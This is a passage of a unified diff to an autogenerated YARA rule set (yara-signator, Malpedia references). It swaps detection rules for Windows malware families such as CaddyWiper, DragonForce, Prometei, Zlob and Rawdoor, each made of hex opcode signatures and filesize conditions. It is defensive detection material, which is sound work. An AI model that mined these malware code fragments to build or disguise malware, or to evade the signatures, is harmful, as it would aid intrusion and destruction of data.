-		$sequence_9 = { b901000000 6bd100 8b45f4 0fb64c1010 }
+		$sequence_0 = { 7452 83b98c00000000 7449 4c01de 31db 8b6e20 448b6618 }
+		$sequence_1 = { 83c002 c744240400000000 668945f2 8d45ec c7042400000000 8944240c 8d45f0 }
+		$sequence_2 = { e8???????? 89c3 e8???????? 01c0 895df4 }
+		$sequence_3 = { 31c0 4885c9 4989cb 89d7 7463 4863493c }
+		$sequence_4 = { 8b0402 4c01d8 eb07 48ffc3 ebc8 31c0 }
+		$sequence_5 = { 8d8b00030000 894c2408 8d4b08 894c2404 ff522c 83ec18 }
+		$sequence_6 = { 6685c9 7417 e8???????? 0fb7c0 41ffc1 }
+		$sequence_7 = { 31c0 4885db 7428 4989db 498b4b40 e8???????? 3d88ae6393 }
+		$sequence_8 = { 7425 e8???????? 39f8 751c 8b4624 4801db }
+		$sequence_9 = { 8d8b00030000 894c2408 8d4b08 894c2404 ff522c }
 
 	condition:
-		7 of them and filesize < 246784
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Yokai_Auto : FILE
+rule MALPEDIA_Win_Zlob_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b04b80f2-53b4-5c24-9a48-b847d3a545be"
+		id = "05847610-c838-5d32-b338-8d5b68ddc2fc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yokai"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yokai_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zlob_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "caca021b644694d243a390b5d4a331d52bc15ed81e965c2661870a1fa9d1ad5a"
+		logic_hash = "540ffbf034a9c137ad7d038d10b65fce4aa537a82bbe9b720e7907a3d6dfd9c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83153,32 +83114,32 @@ rule MALPEDIA_Win_Yokai_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83780400 7f5e 8b4d14 83790400 7514 8b5514 8b4208 }
-		$sequence_1 = { 8945fc 837dfc00 751e 8b55fc 8955b4 8d4df4 e8???????? }
-		$sequence_2 = { 8b4d24 51 6a00 6a7e 68???????? 68???????? 68???????? }
-		$sequence_3 = { c645ac4c c645ad6f c645ae61 c645af64 c645b04c c645b169 c645b262 }
-		$sequence_4 = { e8???????? 6a00 6a00 6a00 8d85a0fdffff 50 6a00 }
-		$sequence_5 = { 0345d4 a3???????? 8b4dec 8b15???????? 2b5114 8915???????? 8b450c }
-		$sequence_6 = { 8945c0 8b4dc0 898d70ffffff 8d9570ffffff 52 8d45d0 50 }
-		$sequence_7 = { 8a11 8855ff 8b45f8 8b480c 83c101 8b55f8 894a0c }
-		$sequence_8 = { 8d0c50 894df8 e8???????? c5fe7f4580 8b530c 2b55ec }
-		$sequence_9 = { ff15???????? 3bf4 e8???????? 50 a1???????? 83c004 50 }
+		$sequence_0 = { 8944241c c70424e8030000 e9???????? ffd3 ffd3 ffd6 }
+		$sequence_1 = { 0f8436010000 ffd5 ffd5 ffd6 ffd7 }
+		$sequence_2 = { ffd7 ffd6 ffd7 ffd6 ffd6 ffd7 8d842440020000 }
+		$sequence_3 = { 50 ffd6 85c0 750d 6a08 6a01 57 }
+		$sequence_4 = { c685f5fdffff31 c685f6fdffff65 c685f7fdffff30 c685f8fdffff2d c685f9fdffff64 c685fafdffff65 }
+		$sequence_5 = { 8d4c242c e8???????? 8b442448 89442410 eb05 834c2410ff 8d4c241c }
+		$sequence_6 = { 742e 6a03 ff75f0 ff15???????? 85c0 751f 6a03 }
+		$sequence_7 = { c644241301 ff742414 ff15???????? 8b3d???????? ff742418 ff15???????? }
+		$sequence_8 = { 6a0c a3???????? e8???????? 59 85c0 }
+		$sequence_9 = { 895104 e8???????? c20400 56 57 8b7c240c 8bc7 }
 
 	condition:
-		7 of them and filesize < 2066432
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Rctrl_Auto : FILE
+rule MALPEDIA_Win_Targetcompany_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "521dcb03-760d-5ed1-9bc0-cfe33a8e8406"
+		id = "4c6c1b9e-4647-5918-893c-d13ce0b5fa25"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rctrl_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.targetcompany"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.targetcompany_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "3aa1e790ecad0aeaad15ec64d74fdf04a1c9b1767736a5ae9f383b695d1cefd0"
+		logic_hash = "47a23feab60239622d1061098dd7caa46d2a81895190e3a3f7d203abbeea4b5b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83192,32 +83153,32 @@ rule MALPEDIA_Win_Rctrl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41 0024bf 41 00558b ec 81ec90000000 a1???????? }
-		$sequence_1 = { e8???????? c3 83795c00 7405 }
-		$sequence_2 = { 7507 32db e9???????? 6890010000 8d8564fcffff 6a00 50 }
-		$sequence_3 = { e8???????? cc 55 8bec 837d0c00 57 8bf9 }
-		$sequence_4 = { 8b02 3b07 7536 52 e8???????? 83ceff 8985c8fbffff }
-		$sequence_5 = { b801000000 833d????????00 0f8516710000 ba05000000 8d0dd0185a00 e8???????? 5a }
-		$sequence_6 = { ffb3780b0000 8d4d80 6a00 6a00 56 50 e8???????? }
-		$sequence_7 = { 8bc7 8b55cc 83c2f0 f00fc1420c 48 85c0 7f08 }
-		$sequence_8 = { 84c0 75f9 2bce 51 52 e8???????? 6a00 }
-		$sequence_9 = { e9???????? 8d8de0fcffff e9???????? 8d8de8fcffff e9???????? 8d8d00fdffff e9???????? }
+		$sequence_0 = { 8955f4 e8???????? ff75b4 8bf8 53 }
+		$sequence_1 = { e8???????? 8d45b0 50 8d85c0feffff 50 8d8d10ffffff e8???????? }
+		$sequence_2 = { 8bcf 83f808 7207 8b17 89550c eb03 897d0c }
+		$sequence_3 = { 57 6a0f 5a 8bce 8d45e0 e8???????? }
+		$sequence_4 = { 50 ff15???????? be08000100 56 8944242c 8d842430450000 53 }
+		$sequence_5 = { 53 895db0 8955b4 e8???????? ff75b4 8906 8b4708 }
+		$sequence_6 = { 0f85a0000000 56 50 68???????? e8???????? 83c40c 83bdbcfeffff20 }
+		$sequence_7 = { 8945c0 8b75c0 8d7d9c a5 }
+		$sequence_8 = { ab ab 53 53 ab 8b442424 6801200000 }
+		$sequence_9 = { 83fe50 72d0 8db564ffffff e8???????? }
 
 	condition:
-		7 of them and filesize < 4315136
+		7 of them and filesize < 328704
 }
-rule MALPEDIA_Win_Orcarat_Auto : FILE
+rule MALPEDIA_Win_Sanny_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f18bd4e3-b820-5b26-a4b2-4899e6f773ec"
+		id = "3b4b3143-6e56-57d2-a40c-de1821af2738"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.orcarat_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sanny_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "267a82fd5372f110668cffe923381f6f74a52ece9ba8a9c79d169c7d32552337"
+		logic_hash = "e2fbc4a585eb4f31f4417da33af8b6c1fed46bb262bdcc20859cec67dc3394ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83231,32 +83192,32 @@ rule MALPEDIA_Win_Orcarat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a0d???????? 8a15???????? 346f 80f170 8844245e a1???????? 884c245c }
-		$sequence_1 = { 85c0 755a 57 8dbbb0010000 83c9ff 8d9534020000 }
-		$sequence_2 = { 51 68???????? 53 56 ffd5 85c0 }
-		$sequence_3 = { 8bcd 6a00 e8???????? 85c0 7507 5f }
-		$sequence_4 = { c21000 8d442420 6a00 8d4c2418 50 51 }
-		$sequence_5 = { 6a01 8bcd c7432801000000 896c241c e8???????? }
-		$sequence_6 = { 8b942408080000 56 8bf1 57 8bfa 83c9ff 33c0 }
-		$sequence_7 = { 5e 81c404080000 c20400 8d54240e 8bce 52 }
-		$sequence_8 = { f3a5 8bc8 83e103 f3a4 8d4c241c 51 e8???????? }
-		$sequence_9 = { 0f84d1000000 80bc241c0400003f 0f8488000000 8bc3 8d94241c040000 2bc2 8dbc241c040000 }
+		$sequence_0 = { 68???????? 56 e8???????? 8b4c2434 8b542430 51 52 }
+		$sequence_1 = { 8b4c240c 6a05 51 8bce }
+		$sequence_2 = { 8d4c241c 51 8d542444 6a00 8d4c2434 52 51 }
+		$sequence_3 = { 894614 83c002 50 e8???????? 8b4e14 83c404 41 }
+		$sequence_4 = { eb63 3c02 755f 8b861cc70000 85c0 7455 8b542408 }
+		$sequence_5 = { 8b542410 52 ffd5 8d442414 43 50 53 }
+		$sequence_6 = { 8b54244c 8d442454 8d4c240c 50 51 8d442428 52 }
+		$sequence_7 = { 81ec08040000 8d442400 56 8bb42414040000 50 8b842420040000 8d54240c }
+		$sequence_8 = { 53 57 8d3c85c4714100 bb00100000 7520 53 }
+		$sequence_9 = { 8d3449 2bd1 8d34b530634100 832600 83c60c 4a 75f7 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Dragonforce_Auto : FILE
+rule MALPEDIA_Win_Manitsme_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "04e040d9-91b9-5636-bb88-ea712bdc46a2"
+		id = "71cb4532-c54e-57eb-a20c-2765fcfa6978"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dragonforce"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dragonforce_auto.yar#L1-L90"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.manitsme_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "1983039dbcbe97b58972e2e24c645af80b3369f0d68152ff0fbf029f83aa4fd4"
+		logic_hash = "f54a2de03d86d0088dd4a7debb0ef3d048ee2324f936fed5683caed7b0cf71b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83270,30 +83231,32 @@ rule MALPEDIA_Win_Dragonforce_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83ff01 7564 c745fc???????? bb???????? }
-		$sequence_1 = { 83c608 897dec 8b0481 8bc8 }
-		$sequence_2 = { 88943d09fdffff 47 83ff42 72d6 }
-		$sequence_3 = { 6690 85db 0f844ef4ffff 0fb607 }
-		$sequence_4 = { 8a85a9fcffff e8???????? 8985e0f5ffff 8d8d9cfcffff }
-		$sequence_5 = { 6a00 6a00 6a01 8d85dcfdffff }
-		$sequence_6 = { c6459002 c6459173 c6459202 c6459365 }
-		$sequence_7 = { c644243145 c64424323c c644243369 c64424343c }
+		$sequence_0 = { 895c2450 ffd6 8b35???????? 8d542410 52 }
+		$sequence_1 = { 85c0 0f84a2000000 837c241000 766e 6a00 8d442414 50 }
+		$sequence_2 = { 8bc8 c1f905 8d1c8d40580110 8bf0 83e61f 6bf628 8b0b }
+		$sequence_3 = { d96c2416 e8???????? 83c404 85c0 7505 b8100e0000 }
+		$sequence_4 = { 6a02 68???????? be07000000 e8???????? }
+		$sequence_5 = { 68???????? 32db e8???????? dc0d???????? }
+		$sequence_6 = { 52 be04010000 8bfb e8???????? }
+		$sequence_7 = { ff15???????? 6a00 b801000000 e8???????? 83c404 b801000000 c20c00 }
+		$sequence_8 = { ffd3 85c0 7586 50 ff15???????? }
+		$sequence_9 = { 7416 8bc1 83e01f 6bc028 8bd1 c1fa05 03049540580110 }
 
 	condition:
-		7 of them and filesize < 879616
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Caddywiper_Auto : FILE
+rule MALPEDIA_Win_Rawdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3bfe4656-7095-5bf1-a220-b7990a8e8540"
+		id = "cc76b812-17c2-5ec8-96b0-76719ad244ed"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.caddywiper_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rawdoor_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "1d17e07981d8c6c1b9158309889ffc1ea6f49825b4f9491b9319c2fdd5793cb7"
+		logic_hash = "ec178538305c82f8b2a93ab81f9192cdc24be91763d3a20d8dccb588ac264211"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83307,32 +83270,38 @@ rule MALPEDIA_Win_Caddywiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c645af55 c645b073 c645b165 c645b272 c645b373 c645b400 }
-		$sequence_1 = { 33c0 eb69 c78564ffffff01000000 8b55a8 899568ffffff }
-		$sequence_2 = { c685b6fbffff65 c685b7fbffff00 c685b8fbffff72 c685b9fbffff00 c685bafbffff6e c685bbfbffff00 }
-		$sequence_3 = { 33c0 eb13 ff55b4 3d14050000 7504 }
-		$sequence_4 = { c68597feffff00 c68598feffff70 c68599feffff00 c6859afeffff69 c6859bfeffff00 c6859cfeffff33 }
-		$sequence_5 = { 0f85fe000000 8b55f4 8b4210 8945f0 }
-		$sequence_6 = { c685b8feffff72 c685b9feffff69 c685bafeffff74 c685bbfeffff79 c685bcfeffff49 }
-		$sequence_7 = { 85d2 7421 8b4508 0345f4 8a4dfb }
-		$sequence_8 = { c745fc00000000 c68538ffffff43 c68539ffffff6c c6853affffff6f c6853bffffff73 }
-		$sequence_9 = { 83ec70 c745f800000000 c745ec00000000 64a130000000 }
+		$sequence_0 = { 030e 03d1 c1c207 4103d2 }
+		$sequence_1 = { 030b 4403d1 418bc8 f7d1 23ca }
+		$sequence_2 = { 034218 418d91051d8804 458d8a39d0d4d9 03d0 }
+		$sequence_3 = { 03442444 3d00040000 730e 488d4c2450 }
+		$sequence_4 = { 034210 418d90a9cfde4b 458d81604bbbf6 03d0 }
+		$sequence_5 = { 034608 03d0 8b442408 4103c1 4c8b4c2410 }
+		$sequence_6 = { 034808 4403c1 8bcb f7d1 23ca }
+		$sequence_7 = { 034824 418bc0 4403c9 33c2 418d8be599dbe6 }
+		$sequence_8 = { 0101 0101 0100 0000 0001 }
+		$sequence_9 = { 0000 0001 0100 0001 0101 }
+		$sequence_10 = { 8be5 5d c3 ff15???????? 83f8ff 746f 8d85bcf8ffff }
+		$sequence_11 = { 0f8405010000 83e809 7415 83e803 0f8538010000 c745dc44690210 e9???????? }
+		$sequence_12 = { c3 68???????? 50 ff15???????? 85c0 751f 68???????? }
+		$sequence_13 = { 57 8b7d08 8d14dd00000000 8b0f c1e903 83e13f 894d0c }
+		$sequence_14 = { ffd6 ffb5e4feffff ffd6 57 85db 7439 81fb02010000 }
+		$sequence_15 = { 50 e8???????? 6867010000 8d8529fcffff c68528fcffff00 6a00 50 }
 
 	condition:
-		7 of them and filesize < 33792
+		7 of them and filesize < 445440
 }
-rule MALPEDIA_Win_Ncctrojan_Auto : FILE
+rule MALPEDIA_Win_Lobshot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "621539aa-975e-51db-993a-fe0f56fb0b46"
+		id = "6f20fbff-d088-55ca-8131-38feba325236"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ncctrojan_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lobshot_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "1a1a856a6ccef6fe3d5ce45ce3caa49b1b9096f7072cb08e6fd3fa9a04b80075"
+		logic_hash = "319a86adb13eb9e86d16d75f8640b06a3709c7236ca49379440781ba36dcddcb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83346,38 +83315,32 @@ rule MALPEDIA_Win_Ncctrojan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f805 7536 8b85e8feffff 85c0 750a }
-		$sequence_1 = { 68???????? e9???????? 83f801 750a 68???????? }
-		$sequence_2 = { 750a 68???????? e9???????? 83f802 }
-		$sequence_3 = { d1f9 8d4101 50 e8???????? 8b542410 83c404 8bca }
-		$sequence_4 = { 50 e8???????? 8d45f4 50 8d85e8adffff }
-		$sequence_5 = { c785ccbdffff00000000 668985dcbdffff 8d85ecfdffff 8985d4bdffff }
-		$sequence_6 = { 85d2 0f8407010000 83faff 0f84fe000000 33c0 85d2 }
-		$sequence_7 = { e8???????? 68???????? 6a20 68???????? e8???????? 83c418 e8???????? }
-		$sequence_8 = { 0f99c0 8d044501000000 5e 5d c3 3b0d???????? }
-		$sequence_9 = { 03c1 50 51 ff7304 }
-		$sequence_10 = { 837dec08 8d45d8 0f4345d8 83ec18 }
-		$sequence_11 = { 8965f0 6a01 8945ec 40 6a00 }
-		$sequence_12 = { 7e6f 8945c8 8b400c 8b7004 }
-		$sequence_13 = { 0f437d08 ff15???????? 50 56 }
-		$sequence_14 = { 50 51 8d4d08 e8???????? 56 8985c8feffff 8d4d08 }
-		$sequence_15 = { 02c9 2480 7403 80f11b 83ea01 }
+		$sequence_0 = { 8b4e08 8a86b1160000 eb10 85c0 7e12 8b5608 8b4e14 }
+		$sequence_1 = { 0f8c89040000 85db b98a000000 6a07 58 0f45c8 33c0 }
+		$sequence_2 = { 5f c3 53 56 85c9 7462 }
+		$sequence_3 = { 6685c9 740a 83f92e 7405 }
+		$sequence_4 = { 8945e8 66d3e0 660b86b0160000 0fb7c0 8945f8 6a10 58 }
+		$sequence_5 = { 8b7d18 33c9 6a0f 41 58 39b48d78ffffff 7505 }
+		$sequence_6 = { 8b4764 8a5401ff 8b8f98160000 8b879c160000 66893448 8b8798160000 8b8f90160000 }
+		$sequence_7 = { ff35???????? 6801000080 ff15???????? 85c0 0f851e010000 55 8b2d???????? }
+		$sequence_8 = { 8b8b4c140000 8b83580b0000 8b55ec 89848b540b0000 8bcb e8???????? }
+		$sequence_9 = { 83ec30 8b4204 8945d8 8b4208 53 8b1a 56 }
 
 	condition:
-		7 of them and filesize < 1160192
+		7 of them and filesize < 247808
 }
-rule MALPEDIA_Win_Dorkbot_Ngrbot_Auto : FILE
+rule MALPEDIA_Win_Xiangoop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "95e01109-549b-5610-b7bb-c1343e7b4ee5"
+		id = "361620d5-e5e6-5f74-925d-645a80b78212"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dorkbot_ngrbot_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiangoop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xiangoop_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "ea5d98b6b45b739ecbab0036be4d19cc99f655fde99b26bfe861c5599dba1365"
+		logic_hash = "f8f21cace7fd103bdd27ecbe99bad091ab92dc71874d8f32014c3d64cede2d0d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83391,32 +83354,32 @@ rule MALPEDIA_Win_Dorkbot_Ngrbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 740c 8b8cb51cffffff 51 ffd0 eb0d 8b94b51cffffff }
-		$sequence_1 = { 85f6 0f84a8020000 6a00 6800040000 8d9578fbffff }
-		$sequence_2 = { ff15???????? 85c0 0f8c9f000000 8b4508 85c0 0f8494000000 8b4dfc }
-		$sequence_3 = { e8???????? 8bf0 83c408 85f6 0f84dc000000 6a06 68???????? }
-		$sequence_4 = { 51 7416 68???????? 52 50 e8???????? 83c410 }
-		$sequence_5 = { 8b4d0c 51 50 6a00 ff15???????? 50 ff15???????? }
-		$sequence_6 = { 8d85f1feffff 6a00 50 c685f0feffff00 e8???????? 8b4d14 83c40c }
-		$sequence_7 = { 8d8500f8ffff 50 ff15???????? 8b550c 8b4508 8d8d00f8ffff 51 }
-		$sequence_8 = { 8d55f0 52 68???????? e8???????? 83c40c 85c0 7530 }
-		$sequence_9 = { b8???????? 5b 8be5 5d c3 ff15???????? 5e }
+		$sequence_0 = { 8945fc e9???????? e9???????? 837d1020 0f850e040000 b901000000 6bd100 }
+		$sequence_1 = { 81e2ff000000 8b45f4 c1e810 25ff000000 8b0c95587d0110 330c8558650110 8b55f8 }
+		$sequence_2 = { 6bd10d 8b4dfc 890411 ba04000000 6bc206 }
+		$sequence_3 = { 83e801 0f8539010000 c745e414430110 8b4508 }
+		$sequence_4 = { 8b45f4 0fb64c081c 81e1ff000000 c1e108 0bd1 }
+		$sequence_5 = { 57 8d1c8518b00110 8b03 90 8b15???????? 83cfff 8bca }
+		$sequence_6 = { b804000000 6bc805 8b45fc 8b75fc 8b1410 }
+		$sequence_7 = { 8b55f0 c1ea00 81e2ff000000 330495585d0110 b904000000 6bd105 }
+		$sequence_8 = { 8b45dc c1e800 25ff000000 330c85585d0110 ba04000000 6bc203 8b55fc }
+		$sequence_9 = { b901000000 6bd100 8b45f4 0fb64c1010 }
 
 	condition:
-		7 of them and filesize < 638976
+		7 of them and filesize < 246784
 }
-rule MALPEDIA_Win_Prometei_Auto : FILE
+rule MALPEDIA_Win_Nvisospit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "62ace16c-b0c3-554c-a9f7-6209373c3e72"
+		id = "45693521-741e-5d7b-a1e6-3a76e159ad3c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prometei"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.prometei_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nvisospit_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "9dde111159215a62fc6cb6707e61b66d4977093dee25c22cb9e592670f784bca"
+		logic_hash = "ff70ccb56c3ba29da1863614e8053ff80e99b0375420038026fb05b34e9ea2b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83430,38 +83393,32 @@ rule MALPEDIA_Win_Prometei_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 011d???????? 03c8 8b5de4 a1???????? }
-		$sequence_1 = { 5b 8d7db0 8907 8bc7 bf1f000000 897004 894808 }
-		$sequence_2 = { 33c0 85ff 742c 8b75d8 03f2 0fbe5405b8 }
-		$sequence_3 = { 014368 81434400020000 c7434000000000 83534800 }
-		$sequence_4 = { 014358 8b45f0 01435c 8b45fc }
-		$sequence_5 = { ff15???????? 0fbe05???????? 56 8945fc ff15???????? }
-		$sequence_6 = { b801000000 f745c000020000 8bd1 0f44f8 }
-		$sequence_7 = { 833d????????00 0f85cc000000 6a00 6880000000 6a03 6a00 6a00 }
-		$sequence_8 = { 10d0 00bb2d784334 2cbb 8d3b 61 }
-		$sequence_9 = { f5 b56b 55 48 2d63d3c0b9 25809d1976 0482 }
-		$sequence_10 = { 013d???????? 8b04b5c8054400 0500080000 3bc8 }
-		$sequence_11 = { 01435c 8b45fc 014360 8b45f4 }
-		$sequence_12 = { e8???????? 44 b46b d6 1e }
-		$sequence_13 = { 014364 8b45e4 014368 5b }
-		$sequence_14 = { 014360 8b45f4 014364 8b45e4 }
-		$sequence_15 = { 014354 8b45e8 014358 8b45f0 }
+		$sequence_0 = { 83f807 7ea8 83f80b 8b15???????? 0f8e16010000 85d2 0f8493010000 }
+		$sequence_1 = { 0f8598000000 8b15???????? b9???????? e9???????? 0fb60f 89cb }
+		$sequence_2 = { 3b5dc4 89b700004000 89da 75d8 }
+		$sequence_3 = { 8b00 89442404 c70424???????? e8???????? 8b859cf9ffff 0fb74004 0fb7c0 }
+		$sequence_4 = { 8d7600 8dbc2700000000 b9???????? 85d2 0f85eafeffff 8b7104 }
+		$sequence_5 = { 83c308 8b7a04 8b12 039700004000 8d8700004000 89d6 e8???????? }
+		$sequence_6 = { 89742410 894c240c 89542408 89442404 c70424???????? }
+		$sequence_7 = { 8b35???????? 85f6 0f8ef0000000 8b3d???????? }
+		$sequence_8 = { b9???????? e9???????? 0fb60f 89cb 81cb00ffffff }
+		$sequence_9 = { 89c3 89f8 e8???????? 891f ebcc 0fb79900004000 }
 
 	condition:
-		7 of them and filesize < 51014656
+		7 of them and filesize < 66560
 }
-rule MALPEDIA_Win_Graphsteel_Auto : FILE
+rule MALPEDIA_Win_Bunnyloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fd70cca8-a56d-5225-a00e-9e9a8f58f3be"
+		id = "0daa091a-7685-5a2e-b265-d5329b5c0a21"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graphsteel_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunnyloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bunnyloader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e3e7b2c9268861fa25138183cb28ca132ae718be8ddf794ff818ae9183996560"
+		logic_hash = "b53a936a0dceb8c6261eaef889e6613b1973524457e163036a774308b6a54923"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83475,32 +83432,32 @@ rule MALPEDIA_Win_Graphsteel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 488d0584215d00 bb10000000 e8???????? 4889f8 b900200000 e8???????? }
-		$sequence_1 = { 8b842490000000 85c0 0f84e8feffff 488d4c2470 e8???????? 4489e0 4881c4b0000000 }
-		$sequence_2 = { 664189856c010000 498b8528010000 4885c0 7407 c7401807000000 4c89e9 4531e4 }
-		$sequence_3 = { e8???????? 660f1f840000000000 4885c9 0f8425040000 48f7c160000000 7404 31d2 }
-		$sequence_4 = { ff15???????? 807e6900 7472 8b4628 85c0 7e4e 31db }
-		$sequence_5 = { e9???????? 488d7101 4839f7 732b 488d0533c23600 e8???????? 488d7301 }
-		$sequence_6 = { 488d6c2430 48897c2420 48894c2450 48895c2448 4889442428 488d05cd4f4b00 e8???????? }
-		$sequence_7 = { eb0c 488d3d1e448600 e8???????? 488b0d???????? 48898c24f0020000 488d0533115500 e8???????? }
-		$sequence_8 = { 90 488b5c2468 488b4c2470 488d3d96682100 4889c6 4531c0 4531c9 }
-		$sequence_9 = { bb1a000000 e8???????? 0f1f440000 e8???????? 488d0594745400 488d1d8deb6400 e8???????? }
